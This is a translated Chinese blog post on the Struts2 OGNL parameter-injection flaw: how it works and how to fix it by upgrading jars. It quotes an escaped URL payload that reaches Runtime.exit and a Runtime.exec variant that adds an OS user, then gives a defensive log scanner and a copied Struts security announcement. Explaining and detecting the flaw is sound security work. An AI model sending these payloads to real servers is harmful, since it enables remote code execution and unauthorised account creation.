Struts2 vulnerability: how it works and how to fix it

Source: Internet  Published under: linux server system commands  Editor: 程序博客网  Time: 2024/05/16 00:54

The vulnerability has been known for a long time; the following post was published on 13 September 2012:

http://www.2cto.com/Article/201209/154990.html

1. How it works

Struts2 is built on the WebWork framework. When it handles an action, it processes HTTP parameters by calling the underlying getter/setter methods, treating every HTTP parameter as an OGNL expression. When we submit an HTTP parameter:

?user.address.city=Bishkek&user['favoriteDrink']=kumys
OGNL converts it into:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")

This is done by the ParametersInterceptor, which calls ValueStack.setValue() with the user-supplied HTTP parameters.

To prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in parameter names. But if the Java Unicode escape \u0023 is used instead, an attacker can bypass that protection and modify the values that guard Java method execution:

This code is destructive; run it only in a test environment. Using this method for malicious attacks is strictly prohibited.
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1 

After unescaping it looks like this:

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

The end result once OGNL has evaluated it is

java.lang.Runtime.getRuntime().exit(1);  // terminates the process, i.e. shuts down the web application

In the same way it is possible to execute
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");  // adds an operating-system user; succeeds if the process has the privilege (in the URL, replace spaces with %20 and / with %2F)
Given sufficient privileges, any DOS command can be executed this way.
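A defender-side check for the bypass described above, added here as an example that is not part of the original post: it decodes both %XX and Java \uXXXX escapes before comparing a parameter name against an accept-list (the regex is an assumed illustration of the kind of check ParametersInterceptor performs, not the exact pattern of any Struts release) and flags the markers that only appear when OGNL is being steered. The sample query is the one quoted above.

```python
import re

# Accept-list for parameter names: an assumed illustration of the kind of check
# ParametersInterceptor performs, not the exact regex of any Struts release.
ACCEPTED_NAME = re.compile(r"[a-zA-Z0-9.\[\]()_'\s]+")
JAVA_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
PERCENT_ESCAPE = re.compile(r"%([0-9a-fA-F]{2})")
# Substrings that never occur in a legitimate bean property path.
OGNL_MARKERS = ("_memberAccess", "denyMethodExecution", "java.lang.Runtime")

# Constructed sample for the scanner: the query string quoted in the post above.
SAMPLE_PAYLOAD = (
    r"""?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true"""
    r"""&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']"""
    r"""\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))"""
    r"""&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1"""
)

def normalise(raw):
    """Decode %XX and Java-style \\uXXXX escapes, so encoded '#', '@' and '='
    compare equal to their plain forms (this is what the \\u0023 bypass relies on)."""
    decoded = PERCENT_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw)
    return JAVA_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)

def split_query(query):
    """Split on '&' and the first '=' without decoding, so '=' hidden as \\u003d stays in the name."""
    pairs = []
    for part in query.lstrip("?").split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs

def flag_param_name(raw_name):
    """Return the reasons a parameter name looks like OGNL tampering ([] if clean)."""
    reasons = []
    if JAVA_ESCAPE.search(raw_name):
        reasons.append("java-unicode-escape-in-name")
    name = normalise(raw_name)
    if not ACCEPTED_NAME.fullmatch(name):
        reasons.append("name-outside-accept-list")
    reasons.extend("ognl-char:" + c for c in "#@" if c in name)
    reasons.extend("marker:" + m for m in OGNL_MARKERS if m in name)
    return reasons

def scan_query(query):
    """Map each suspicious parameter name (decoded form) to its reasons."""
    flagged = ((normalise(n), flag_param_name(n)) for n, _ in split_query(query))
    return {name: reasons for name, reasons in flagged if reasons}
```

Run `scan_query` over the query part of each request line in an access log; a non-empty result on a Struts2 endpoint is worth an alert regardless of whether the application was patched.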

2. Solution
Many articles online describe three fixes. In my opinion, updating the Struts2 jars to the latest version is the simplest, since no application code has to change; the latest version at the moment is 2.3.4.
The downloaded update contains many jars; on my system I mainly used the following to replace the old versions:
commons-lang3-3.1.jar       (keep commons-lang-2.6.jar)
javassist-3.11.0.GA.jar     (new jar)
ognl-3.0.5.jar              (replaces the old version)
struts2-core-2.3.4.1.jar    (replaces the old version)
xwork-core-2.3.4.1.jar      (replaces the old version)

The latest Struts2 release has fixed this problem:

http://struts.apache.org/announce.html

Announcements


16 July 2013 - Struts 2.3.15.1 General Availability Release - Security Fix Release

The Apache Struts group is pleased to announce that Struts 2.3.15.1 is available as a "General Availability" release. The GA designation is our highest quality grade.

Apache Struts 2 is an elegant, extensible framework for creating enterprise-ready Java web applications. The framework is designed to streamline the full development cycle, from building, to deploying, to maintaining applications over time.

Two security issues were solved with this release:

  • S2-016 - Remote code execution vulnerability when using short-circuit navigation parameter prefixes
  • S2-017 - Open redirect vulnerability when using short-circuit redirect parameter prefixes

All developers are strongly advised to update existing Struts 2 applications to Struts 2.3.15.1.

Struts 2.3.15.1 is available in a full distribution or as separate library, source, example and documentation distributions, from the releases page. The release is also available through the central Maven repository under Group ID "org.apache.struts". The release notes are available online.

The 2.3.x series of the Apache Struts framework has a minimum requirement of the following specification versions: Servlet API 2.4, JSP API 2.0, and Java 5.

Should any issues arise with your use of any version of the Struts framework, please post your comments to the user list, and, if appropriate, file a tracking ticket.
